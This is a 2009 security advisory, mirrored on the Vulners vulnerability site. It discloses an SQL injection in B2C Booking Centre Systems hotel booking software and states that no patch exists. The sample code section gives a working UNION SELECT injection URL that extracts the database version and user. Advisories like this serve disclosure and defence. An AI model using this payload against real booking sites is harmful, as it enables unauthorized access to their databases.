Lucene search
K

B2C Booking Centre Systems SQL Injection

🗓️ 15 Dec 2009 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

B2C Booking Centre Systems SQL Injection Vulnerability in Hotel Booking Softwar

Code
`B2C Booking Centre Systems - SQL Injection Vulnerability  
  
Name B2D Booking Centre Systems  
Vendor http://www.bookingcentre.eu  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2009-12-11  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
VI. DISCLOSURE TIMELINE  
  
  
I. ABOUT THE APPLICATION  
  
Booking Centre Systems is a multilingual low cost and high  
performance software solution for any Individual Hotel or  
Hotels Group or Portal Tourist.  
  
  
II. DESCRIPTION  
  
All parameters of this application are not properly  
sanitised and are affected to SQL Injection.  
  
  
III. ANALYSIS  
  
Summary:  
  
A) SQL Injection  
  
A) SQL Injection  
  
All parameters are not properly sanitised and in order to  
exploit they, the Magic Quotes GPG may be On.  
  
  
IV. SAMPLE CODE  
  
http://site/hotel_tiempolibre_ext.php?HotelID=4&NoticiaID=-1 UNION ALL  
SELECT 1,2,3,version(),5,user(),7,8,9%23  
  
  
V. FIX  
  
No patch.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2009 00:00Current
7.4High risk
Vulners AI Score7.4
26